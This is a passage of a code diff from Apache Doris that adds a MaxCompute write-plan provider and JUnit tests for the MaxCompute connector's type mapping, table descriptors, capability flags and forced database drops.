Ported from the legacy fe-core write path — {@code MCTransaction.beginInsert()} + * (write-session creation) and {@code MaxComputeTableSink.bindDataSink()} / + * {@code setWriteContext()} (sink field population). The legacy split between + * {@code finalizeSink} (sink fields) and {@code MCInsertExecutor.beforeExec} + * (runtime {@code txn_id} / {@code write_session_id} injection) collapses into + * this single {@code planWrite} call, which runs at {@code finalizeSink} time when + * the engine transaction id already exists and the write session can be created + * in place (see P4-T04 design, OQ-2 / Approach A).

+ * + *

Runtime block-id allocation ({@code block_id_start} / {@code block_id_count}) + * is intentionally not stamped here: BE allocates it at run time through the + * engine transaction ({@link MaxComputeConnectorTransaction#allocateWriteBlockRange}) + * keyed by {@code txn_id}.

+ * + *

Gate-closed / dormant. Nothing routes plugin-driven MaxCompute writes + * through this provider until the {@code max_compute} cutover. In particular + * {@link #planWrite} requires the session to carry the connector transaction + * (bound by the executor wiring added at cutover); it fails loud if absent.

+ */ +public class MaxComputeWritePlanProvider implements ConnectorWritePlanProvider { + + private static final Logger LOG = LogManager.getLogger(MaxComputeWritePlanProvider.class); + + private final MaxComputeDorisConnector connector; + + public MaxComputeWritePlanProvider(MaxComputeDorisConnector connector) { + this.connector = connector; + } + + @Override + public ConnectorSinkPlan planWrite(ConnectorSession session, ConnectorWriteHandle handle) { + MaxComputeTableHandle mcHandle = (MaxComputeTableHandle) handle.getTableHandle(); + Table odpsTable = mcHandle.getOdpsTable(); + // Reject external tables / logical views before opening a write session (mirrors legacy + // MCTransaction.beginInsert): the ODPS Storage API cannot write to them. + mcHandle.checkOperationSupported("Writing"); + TableIdentifier tableId = mcHandle.getTableIdentifier(); + + boolean isOverwrite = handle.isOverwrite(); + // Static partition spec carried as a col -> val map in the write context (D-5). + Map staticPartitionSpec = handle.getWriteContext(); + boolean isStaticPartition = staticPartitionSpec != null && !staticPartitionSpec.isEmpty(); + + // Partition column names, taken from the ODPS table (DV-012: legacy reads + // the fe-core Doris columns; the values — partition column names — are identical). + List partitionColumnNames = odpsTable.getSchema().getPartitionColumns() + .stream().map(Column::getName).collect(Collectors.toList()); + boolean isDynamicPartition = !partitionColumnNames.isEmpty(); + + EnvironmentSettings settings = connector.getSettings(); + + String writeSessionId = createWriteSession( + tableId, settings, partitionColumnNames, staticPartitionSpec, + isStaticPartition, isDynamicPartition, isOverwrite, mcHandle.getTableName()); + + // Bind the write session to the current connector transaction (T03 slot), + // so block allocation and commit can act on it. + MaxComputeConnectorTransaction transaction = currentTransaction(session); + transaction.setWriteSession(writeSessionId, tableId, settings); + + TMaxComputeTableSink tSink = new TMaxComputeTableSink(); + tSink.setProperties(connector.getProperties()); + tSink.setEndpoint(connector.getEndpoint()); + tSink.setProject(connector.getDefaultProject()); + tSink.setTableName(mcHandle.getTableName()); + tSink.setQuota(connector.getQuota()); + tSink.setConnectTimeout(getConnectTimeout()); + tSink.setReadTimeout(getReadTimeout()); + tSink.setRetryCount(getRetryTimes()); + if (!partitionColumnNames.isEmpty()) { + tSink.setPartitionColumns(partitionColumnNames); + } + if (isStaticPartition) { + tSink.setStaticPartitionSpec(staticPartitionSpec); + } + tSink.setWriteSessionId(writeSessionId); + tSink.setTxnId(transaction.getTransactionId()); + // block_id_start / block_id_count are left unset: BE allocates them at run + // time via the engine transaction (keyed by txn_id). + + TDataSink dataSink = new TDataSink(TDataSinkType.MAXCOMPUTE_TABLE_SINK); + dataSink.setMaxComputeTableSink(tSink); + return new ConnectorSinkPlan(dataSink); + } + + /** + * Creates the ODPS Storage API batch write session and returns its id. Ports + * {@code MCTransaction.beginInsert()}: a static partition pins the target + * partition, otherwise a partitioned table uses dynamic partitioning; overwrite + * is applied when requested. Note the write path uses MILLI/MILLI Arrow units + * (the scan path differs). + */ + private String createWriteSession(TableIdentifier tableId, EnvironmentSettings settings, + List partitionColumnNames, Map staticPartitionSpec, + boolean isStaticPartition, boolean isDynamicPartition, boolean isOverwrite, + String tableName) { + try { + TableWriteSessionBuilder builder = new TableWriteSessionBuilder() + .identifier(tableId) + .withSettings(settings) + .withMaxFieldSize(getMaxFieldSize()) + .withArrowOptions(ArrowOptions.newBuilder() + .withDatetimeUnit(TimestampUnit.MILLI) + .withTimestampUnit(TimestampUnit.MILLI) + .build()); + + if (isStaticPartition) { + builder.partition(new PartitionSpec( + buildStaticPartitionSpecString(partitionColumnNames, staticPartitionSpec))); + } else if (isDynamicPartition) { + builder.withDynamicPartitionOptions(DynamicPartitionOptions.createDefault()); + } + + if (isOverwrite) { + builder.overwrite(true); + } + + TableBatchWriteSession writeSession = builder.buildBatchWriteSession(); + String writeSessionId = writeSession.getId(); + LOG.info("Created MaxCompute write session {} for table {} (overwrite={}, " + + "staticPartition={}, dynamicPartition={})", + writeSessionId, tableName, isOverwrite, isStaticPartition, isDynamicPartition); + return writeSessionId; + } catch (IOException e) { + throw new DorisConnectorException( + "Failed to create MaxCompute write session for table " + tableName + + ": " + e.getMessage(), e); + } + } + + /** + * Joins the static partition spec into {@code "col=val,col=val"} following the + * table's partition column order (mirrors {@code MCTransaction.beginInsert}). + */ + private String buildStaticPartitionSpecString(List partitionColumnNames, + Map staticPartitionSpec) { + return partitionColumnNames.stream() + .filter(staticPartitionSpec::containsKey) + .map(name -> name + "=" + staticPartitionSpec.get(name)) + .collect(Collectors.joining(",")); + } + + private MaxComputeConnectorTransaction currentTransaction(ConnectorSession session) { + Optional transaction = session.getCurrentTransaction(); + if (!transaction.isPresent()) { + throw new DorisConnectorException( + "MaxCompute write requires an active connector transaction bound to the session; " + + "none is present. The executor must open it via beginTransaction and bind " + + "it to the session (wired at the max_compute cutover)."); + } + return (MaxComputeConnectorTransaction) transaction.get(); + } + + private int getConnectTimeout() { + return Integer.parseInt(connector.getProperties().getOrDefault( + MCConnectorProperties.CONNECT_TIMEOUT, + MCConnectorProperties.DEFAULT_CONNECT_TIMEOUT)); + } + + private int getReadTimeout() { + return Integer.parseInt(connector.getProperties().getOrDefault( + MCConnectorProperties.READ_TIMEOUT, + MCConnectorProperties.DEFAULT_READ_TIMEOUT)); + } + + private int getRetryTimes() { + return Integer.parseInt(connector.getProperties().getOrDefault( + MCConnectorProperties.RETRY_COUNT, + MCConnectorProperties.DEFAULT_RETRY_COUNT)); + } + + private long getMaxFieldSize() { + return Long.parseLong(connector.getProperties().getOrDefault( + MCConnectorProperties.MAX_FIELD_SIZE, + MCConnectorProperties.DEFAULT_MAX_FIELD_SIZE)); + } +} diff --git a/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MCTypeMappingTest.java b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MCTypeMappingTest.java new file mode 100644 index 00000000000000..a5fb73241acb5e --- /dev/null +++ b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MCTypeMappingTest.java @@ -0,0 +1,92 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.maxcompute; + +import org.apache.doris.connector.api.ConnectorType; +import org.apache.doris.connector.api.DorisConnectorException; + +import com.aliyun.odps.type.TypeInfoFactory; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +/** + * G7 FIX-VOID-TYPE-MAPPING — pins the ODPS {@code TypeInfo} -> {@link ConnectorType} mapping for + * the two cases that diverged from legacy {@code MaxComputeExternalTable.mcTypeToDorisType}. + * + *

WHY this matters: VOID must emit the {@code "NULL_TYPE"} token, which + * {@code ScalarType.createType} turns into {@code Type.NULL} (legacy parity). The prior bug emitted + * {@code "NULL"}, which {@code ScalarType.createType} does NOT recognize -> it throws -> + * {@code ConnectorColumnConverter} swallowed it to {@code Type.UNSUPPORTED}, so a VOID column + * silently became unusable. Separately, a genuinely unknown OdpsType ({@code OdpsType.UNKNOWN} or a + * future type) must fail-fast (legacy threw "Cannot transform unknown type"), not silently degrade + * to UNSUPPORTED — while the known-unsupported types (BINARY/INTERVAL) keep their explicit + * UNSUPPORTED mapping.

+ */ +public class MCTypeMappingTest { + + @Test + public void voidMapsToNullTypeToken() { + // WHY (Rule 9): VOID must emit the token that yields Type.NULL downstream. MUTATION: + // reverting to of("NULL") makes this red ("NULL" is rejected by ScalarType.createType). + ConnectorType t = MCTypeMapping.toConnectorType(TypeInfoFactory.VOID); + Assertions.assertEquals("NULL_TYPE", t.getTypeName(), + "ODPS VOID must map to the NULL_TYPE token (-> Type.NULL), not NULL"); + } + + @Test + public void arrayOfVoidMapsElementToNullType() { + // The VOID branch is shared by nested element mapping; ARRAY must carry NULL_TYPE. + ConnectorType arr = MCTypeMapping.toConnectorType( + TypeInfoFactory.getArrayTypeInfo(TypeInfoFactory.VOID)); + Assertions.assertEquals("NULL_TYPE", arr.getChildren().get(0).getTypeName(), + "ARRAY element must map to NULL_TYPE"); + } + + @Test + public void binaryStaysUnsupportedNotThrown() { + // WHY: known-unsupported types have explicit UNSUPPORTED cases; the fail-fast default + // (for unknown future types) must NOT swallow them. If BINARY fell through to the default + // it would throw instead of returning UNSUPPORTED. + ConnectorType t = MCTypeMapping.toConnectorType(TypeInfoFactory.BINARY); + Assertions.assertEquals("UNSUPPORTED", t.getTypeName(), + "BINARY is a known-unsupported type: explicit UNSUPPORTED, not a fail-fast throw"); + } + + @Test + public void unknownTypeFailsFast() { + // WHY (Rule 9): a genuinely unknown OdpsType must fail-fast, mirroring legacy + // MaxComputeExternalTable.mcTypeToDorisType:294, instead of silently becoming UNSUPPORTED + // (which masks the problem). MUTATION: reverting the default to of("UNSUPPORTED") makes + // this red (no exception). OdpsType.UNKNOWN reaches the switch default (no explicit case). + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> MCTypeMapping.toConnectorType(TypeInfoFactory.UNKNOWN)); + Assertions.assertTrue(ex.getMessage().toLowerCase().contains("unknown"), + "unknown-type rejection message should mention 'unknown'"); + } + + @Test + public void knownScalarTokensAreStable() { + // Guards against token drift for the common scalars. + Assertions.assertEquals("INT", + MCTypeMapping.toConnectorType(TypeInfoFactory.INT).getTypeName()); + Assertions.assertEquals("STRING", + MCTypeMapping.toConnectorType(TypeInfoFactory.STRING).getTypeName()); + Assertions.assertEquals("BOOLEAN", + MCTypeMapping.toConnectorType(TypeInfoFactory.BOOLEAN).getTypeName()); + } +} diff --git a/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeBuildTableDescriptorTest.java b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeBuildTableDescriptorTest.java new file mode 100644 index 00000000000000..e5ad71f91075df --- /dev/null +++ b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeBuildTableDescriptorTest.java @@ -0,0 +1,95 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.maxcompute; + +import org.apache.doris.thrift.TMCTable; +import org.apache.doris.thrift.TTableDescriptor; +import org.apache.doris.thrift.TTableType; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.HashMap; +import java.util.Map; + +/** + * FIX-READ-DESC (P4-T06d) — guards the MaxCompute read-path table descriptor contract. + * + *

WHY this matters: after the {@code max_compute} cutover, a SELECT routes through + * {@code PluginDrivenExternalTable.toThrift()} → {@code metadata.buildTableDescriptor(...)}. + * BE's {@code file_scanner} static_casts {@code table_desc()} to {@code MaxComputeTableDescriptor} + * unconditionally for {@code table_format_type=="max_compute"}, and reads endpoint/quota/project/ + * table/properties as the auth + addressing contract. If this override regressed to {@code null} + * (SPI default) or a {@code SCHEMA_TABLE} descriptor with no {@code mcTable}, BE would type-confuse + * a {@code SchemaTableDescriptor} as a {@code MaxComputeTableDescriptor} → crash / garbage reads. + * Each assertion below therefore encodes a BE-side requirement, not just the method's shape + * (Rule 9): this test FAILS if the override returns null or any non-MAX_COMPUTE_TABLE descriptor.

+ * + *

Boundary: this connector module has no fe-core dependency, so the test can only assert the + * override's OWN output. It cannot reach the fe-core {@code toThrift} call site (passing remote + * dbName/remoteName, numCols) — that half of the contract is covered by user-run e2e only.

+ * + *

The ctor only assigns its args; {@code buildTableDescriptor} never dereferences odps / + * structureHelper, so passing {@code null} for them is safe and keeps the test offline.

+ */ +public class MaxComputeBuildTableDescriptorTest { + + @Test + public void buildsMaxComputeTableDescriptorWithAuthAndAddressing() { + String endpoint = "http://service.cn-hangzhou.maxcompute.aliyun.com/api"; + String quota = "test_quota"; + Map properties = new HashMap<>(); + properties.put("mc.access_key", "test-ak"); + properties.put("mc.secret_key", "test-sk"); + + MaxComputeConnectorMetadata metadata = new MaxComputeConnectorMetadata( + null, null, "default_project", endpoint, quota, properties); + + // dbName / remoteName are already remote names at the real call site (OQ-7). + long tableId = 42L; + String tableName = "local_table"; + String dbName = "remote_project"; + String remoteName = "remote_table"; + int numCols = 7; + long catalogId = 100L; + + TTableDescriptor desc = metadata.buildTableDescriptor( + null, tableId, tableName, dbName, remoteName, numCols, catalogId); + + // (1) must not be null — null would trigger the SCHEMA_TABLE fallback in fe-core. + Assertions.assertNotNull(desc, + "buildTableDescriptor must return a typed descriptor, never null (BE expects MC type)"); + // (2) BE selects MaxComputeTableDescriptor only for MAX_COMPUTE_TABLE. + Assertions.assertEquals(TTableType.MAX_COMPUTE_TABLE, desc.getTableType(), + "table type must be MAX_COMPUTE_TABLE; SCHEMA_TABLE would crash BE's static_cast"); + // (3) BE reads mcTable for auth/addressing; it must be set. + Assertions.assertTrue(desc.isSetMcTable(), + "mcTable must be set; BE reads endpoint/quota/project/table/properties from it"); + + TMCTable mcTable = desc.getMcTable(); + Assertions.assertEquals(endpoint, mcTable.getEndpoint(), "endpoint must reach BE auth path"); + Assertions.assertEquals(quota, mcTable.getQuota(), "quota must reach BE auth path"); + // project/table must be the REMOTE names — they must match the SPI read session (OQ-7). + Assertions.assertEquals(dbName, mcTable.getProject(), + "project must be the remote dbName param, consistent with the SPI read session"); + Assertions.assertEquals(remoteName, mcTable.getTable(), + "table must be the remote remoteName param, consistent with the SPI read session"); + Assertions.assertEquals(properties, mcTable.getProperties(), + "credentials/properties must be carried through for BE auth"); + } +} diff --git a/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadataCapabilityTest.java b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadataCapabilityTest.java new file mode 100644 index 00000000000000..6dcb647f1b8a87 --- /dev/null +++ b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadataCapabilityTest.java @@ -0,0 +1,75 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.maxcompute; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; + +/** + * P2-6 FIX-CREATE-DB-PRECHECK (clean-room re-review DG-4 / F26, F23) — pins the + * MaxCompute schema-op capability declaration the FE CREATE DATABASE precheck depends on. + * + *

WHY this matters: the fix for DG-4 gates the FE + * {@code CREATE DATABASE IF NOT EXISTS} remote-existence precheck on + * {@code ConnectorSchemaOps.supportsCreateDatabase()} (default false) so that jdbc/es/trino — + * which cannot create databases — keep their existing "not supported" behavior. MaxCompute CAN + * create databases and MUST declare {@code true}, otherwise the precheck is skipped for it and + * the very regression DG-4 describes (CREATE DATABASE IF NOT EXISTS on a remotely-existing db + * surfacing ODPS "already exists") returns. The fe-core routing tests use a mocked connector, so + * this is the only test that pins the real MaxCompute override. MUTATION: flipping the override + * to {@code return false} makes this red. The capability getter touches no instance field, so a + * {@code null} odps/helper keeps the test offline (same pattern as + * {@link MaxComputeBuildTableDescriptorTest}).

+ */ +public class MaxComputeConnectorMetadataCapabilityTest { + + @Test + public void maxComputeDeclaresSupportsCreateDatabase() { + MaxComputeConnectorMetadata metadata = new MaxComputeConnectorMetadata( + null, null, "proj", "ep", "quota", Collections.emptyMap()); + + Assertions.assertTrue(metadata.supportsCreateDatabase(), + "MaxCompute must declare supportsCreateDatabase()=true so the FE " + + "CREATE DATABASE IF NOT EXISTS remote precheck applies to it (DG-4)"); + } + + /** + * F9 FIX-CAST-PUSHDOWN — pins that MaxCompute disables CAST-predicate pushdown. + * + *

WHY this matters: the shared converter unwraps CAST shells, so if this returned + * {@code true} (the SPI default), a predicate like {@code CAST(str_col AS INT)=5} would be pushed + * to ODPS as {@code str_col="5"} and silently drop rows like {@code "05"}/{@code " 5"} at the + * source (BE re-eval cannot recover source-dropped rows). Returning {@code false} makes + * {@code PluginDrivenScanNode.buildRemainingFilter} keep CAST conjuncts BE-only, mirroring legacy + * (which never pushed CAST predicates). MUTATION: flipping the override to {@code true} (or + * removing it, reverting to the default {@code true}) makes this red. Offline: the getter touches + * no instance field, so null odps/helper/session is fine.

+ */ + @Test + public void maxComputeDisablesCastPredicatePushdown() { + MaxComputeConnectorMetadata metadata = new MaxComputeConnectorMetadata( + null, null, "proj", "ep", "quota", Collections.emptyMap()); + + Assertions.assertFalse(metadata.supportsCastPredicatePushdown(null), + "MaxCompute must disable CAST-predicate pushdown (F9): the converter unwraps CAST " + + "shells, and pushing the stripped predicate to ODPS under-matches at the " + + "source and silently drops rows BE re-eval cannot recover"); + } +} diff --git a/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadataDropDbTest.java b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadataDropDbTest.java new file mode 100644 index 00000000000000..2c47bd3bd9d89f --- /dev/null +++ b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadataDropDbTest.java @@ -0,0 +1,211 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.maxcompute; + +import org.apache.doris.connector.api.DorisConnectorException; + +import com.aliyun.odps.Odps; +import com.aliyun.odps.OdpsException; +import com.aliyun.odps.Partition; +import com.aliyun.odps.Table; +import com.aliyun.odps.TableSchema; +import com.aliyun.odps.Tables; +import com.aliyun.odps.table.TableIdentifier; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.ArrayList; +import java.util.Arrays; +import java.util.Collections; +import java.util.Iterator; +import java.util.List; + +/** + * P2-5 FIX-DROP-DB-FORCE (clean-room re-review DG-3 / F22, F27) — guards that + * {@code DROP DATABASE ... FORCE} cascades the table drops in the connector. + * + *

WHY this matters: after the SPI cutover the FE + * {@code PluginDrivenExternalCatalog.dropDb} discarded the user's {@code force} flag, + * and the connector's {@code dropDatabase} just called {@code schemas().delete()}. + * ODPS {@code schemas().delete()} does NOT auto-cascade (the legacy + * {@code MaxComputeMetadataOps.dropDbImpl} force-branch enumerate-loop is itself proof), + * so on a non-empty schema {@code DROP DB FORCE} degraded to a non-FORCE drop — + * failing outright or leaving residue, while silently ignoring FORCE (Rule 12). These + * tests pin the restored cascade: every table is dropped BEFORE the schema, only when + * FORCE is set, and a failing remote drop aborts loudly before the schema is deleted.

+ * + *

The maxcompute connector test module has no Mockito, so a hand-written recording + * {@link McStructureHelper} captures the call order. {@code dropDatabase} never + * dereferences {@code odps} (it only passes it to the helper), so a {@code null} odps + * keeps the test offline — the same pattern as {@link MaxComputeBuildTableDescriptorTest}.

+ */ +public class MaxComputeConnectorMetadataDropDbTest { + + private MaxComputeConnectorMetadata metadataWith(RecordingStructureHelper helper) { + return new MaxComputeConnectorMetadata( + null /* odps */, helper, "proj", "ep", "quota", Collections.emptyMap()); + } + + @Test + public void forceTrueCascadesAllTablesBeforeDroppingSchema() { + RecordingStructureHelper helper = new RecordingStructureHelper(Arrays.asList("t1", "t2")); + MaxComputeConnectorMetadata metadata = metadataWith(helper); + + metadata.dropDatabase(null, "db1", false, true); + + // WHY: legacy parity requires every table dropped first (ODPS won't auto-cascade), + // each with ifExists=true so a raced already-gone table does not abort the cascade. + // MUTATION: removing the `if (force) {...}` block -> log is just ["dropDb:db1"] (red); + // flipping the hardcoded dropTable(...,true) to false -> ":false" markers (red). + Assertions.assertEquals( + Arrays.asList("dropTable:t1:true", "dropTable:t2:true", "dropDb:db1"), + helper.log, + "FORCE must drop every table (in order, ifExists=true) before deleting the schema"); + } + + @Test + public void forceFalseDoesNotEnumerateOrDropTables() { + RecordingStructureHelper helper = new RecordingStructureHelper(Arrays.asList("t1", "t2")); + MaxComputeConnectorMetadata metadata = metadataWith(helper); + + metadata.dropDatabase(null, "db1", false, false); + + // WHY: a plain (non-FORCE) DROP DB must never delete tables; over-correcting into + // always-cascading would silently drop user data. MUTATION: making the gate + // unconditional records dropTable calls -> red. + Assertions.assertEquals( + Collections.singletonList("dropDb:db1"), + helper.log, + "non-FORCE must drop only the schema, never the tables"); + } + + @Test + public void forceTrueOnEmptySchemaJustDropsDb() { + RecordingStructureHelper helper = new RecordingStructureHelper(Collections.emptyList()); + MaxComputeConnectorMetadata metadata = metadataWith(helper); + + metadata.dropDatabase(null, "db1", false, true); + + // WHY: FORCE on an empty schema must behave like a plain drop (loop is a no-op). + Assertions.assertEquals( + Collections.singletonList("dropDb:db1"), + helper.log, + "FORCE on an empty schema must just drop the schema"); + } + + @Test + public void forceTrueSurfacesRemoteDropFailureAsConnectorException() { + RecordingStructureHelper helper = new RecordingStructureHelper(Arrays.asList("t1", "t2")); + helper.failOnTable = "t2"; + MaxComputeConnectorMetadata metadata = metadataWith(helper); + + // WHY (Rule 12 fail-loud): a failing remote table drop must abort the cascade BEFORE + // the schema is deleted and surface as DorisConnectorException, not be swallowed. + // MUTATION: catch+continue (swallow OdpsException) would let dropDb run -> red. + DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, + () -> metadata.dropDatabase(null, "db1", false, true)); + Assertions.assertTrue(ex.getMessage().contains("t2"), + "the failure must name the table that could not be dropped"); + Assertions.assertFalse(helper.log.contains("dropDb:db1"), + "the schema must NOT be deleted after a failed table cascade"); + } + + /** + * Recording fake: returns a fixed table list and appends an ordered marker for each + * cascade call. Only the three methods the cascade touches are meaningful; the rest + * return harmless defaults (they are never invoked by {@code dropDatabase}). + */ + private static final class RecordingStructureHelper implements McStructureHelper { + private final List tables; + private final List log = new ArrayList<>(); + private String failOnTable; + + RecordingStructureHelper(List tables) { + this.tables = tables; + } + + @Override + public List listTableNames(Odps mcClient, String dbName) { + return tables; + } + + @Override + public void dropTable(Odps mcClient, String dbName, String tableName, boolean ifExists) + throws OdpsException { + // Record ifExists too: the cascade must pass ifExists=true (legacy + // dropTableImpl(tbl, true)) so a duplicate/raced already-gone table does not + // abort the cascade. Pinning it makes a true->false mutation go red. + log.add("dropTable:" + tableName + ":" + ifExists); + if (tableName.equals(failOnTable)) { + throw new OdpsException("simulated remote drop failure for " + tableName); + } + } + + @Override + public void dropDb(Odps mcClient, String dbName, boolean ifExists) { + log.add("dropDb:" + dbName); + } + + // ---- unused by dropDatabase: harmless defaults ---- + + @Override + public List listDatabaseNames(Odps mcClient, String defaultProject) { + return Collections.emptyList(); + } + + @Override + public boolean tableExist(Odps mcClient, String dbName, String tableName) { + return false; + } + + @Override + public boolean databaseExist(Odps mcClient, String dbName) { + return false; + } + + @Override + public TableIdentifier getTableIdentifier(String dbName, String tableName) { + return null; + } + + @Override + public List getPartitions(Odps mcClient, String dbName, String tableName) { + return Collections.emptyList(); + } + + @Override + public Iterator getPartitionIterator(Odps mcClient, String dbName, String tableName) { + return Collections.emptyIterator(); + } + + @Override + public Table getOdpsTable(Odps mcClient, String dbName, String tableName) { + return null; + } + + @Override + public Tables.TableCreator createTableCreator(Odps mcClient, String dbName, + String tableName, TableSchema schema) { + return null; + } + + @Override + public void createDb(Odps mcClient, String dbName, boolean ifNotExists) { + } + } +} diff --git a/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadataIsKeyTest.java b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadataIsKeyTest.java new file mode 100644 index 00000000000000..4f24940a892b7e --- /dev/null +++ b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadataIsKeyTest.java @@ -0,0 +1,79 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.maxcompute; + +import org.apache.doris.connector.api.ConnectorColumn; +import org.apache.doris.connector.api.ConnectorType; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +/** + * FIX-ISKEY-METADATA (P4-T06e / NG-6 / F3 / F10) — guards + * {@link MaxComputeConnectorMetadata#buildColumn}, the single seam through which both + * {@code getTableSchema} column loops construct their {@link ConnectorColumn}s. + * + *

Why this matters: legacy {@code MaxComputeExternalTable.initSchema} marked every column + * {@code isKey=true}; the cutover's 5-arg ctor defaulted it to {@code false}, regressing + * {@code DESCRIBE } to {@code Key=NO} (and silently changing the non-OLAP-guarded planning + * /BE paths that read {@code Column.isKey()}). This pins the {@code isKey=true} invariant in the + * MaxCompute module.

+ * + *

Coverage scope: this pins the {@code buildColumn} helper invariant only. The + * {@code getTableSchema → buildColumn} wiring is NOT unit-tested here because {@code getTableSchema} + * dereferences a live {@code com.aliyun.odps.Table}, whose only constructor is package-private and + * this connector module has no Mockito (driving it offline would require a {@code com.aliyun.odps} + * -package fixture subclass overriding {@code getSchema()} — no precedent in this repo). A future + * call site that bypasses {@code buildColumn} (reverting to the 5-arg ctor) would not be caught + * here — the e2e {@code DESCRIBE} assertion is the load-bearing regression gate for the wiring + * (recorded as a deviation).

+ */ +public class MaxComputeConnectorMetadataIsKeyTest { + + @Test + public void testBuildColumnMarksKeyTrue() { + // The core regression guard: every MaxCompute column must be isKey=true (legacy parity). + ConnectorColumn col = MaxComputeConnectorMetadata.buildColumn( + "c1", ConnectorType.of("INT"), "a comment", true); + Assertions.assertTrue(col.isKey()); + } + + @Test + public void testBuildColumnPreservesOtherFields() { + // Non-vacuous: the helper must build a correct column, not just flip the key flag. + ConnectorColumn col = MaxComputeConnectorMetadata.buildColumn( + "c1", ConnectorType.of("INT"), "a comment", true); + Assertions.assertEquals("c1", col.getName()); + Assertions.assertEquals(ConnectorType.of("INT"), col.getType()); + Assertions.assertEquals("a comment", col.getComment()); + Assertions.assertTrue(col.isNullable()); + Assertions.assertNull(col.getDefaultValue()); + // External tables never carry auto-increment columns; mirrors legacy. + Assertions.assertFalse(col.isAutoInc()); + } + + @Test + public void testBuildColumnKeyIndependentOfNullable() { + // Guards against accidentally wiring isKey to the nullable arg: a non-nullable + // (e.g. partition-style) column is still a key column. + ConnectorColumn col = MaxComputeConnectorMetadata.buildColumn( + "pt", ConnectorType.of("STRING"), null, false); + Assertions.assertTrue(col.isKey()); + Assertions.assertFalse(col.isNullable()); + } +} diff --git a/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorProviderTest.java b/fe/fe-connector/fe-connector-maxcompute/src/test/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorProviderTest.java new file mode 100644 index 00000000000000..479e3c0bfc24f8 --- /dev/null +++ 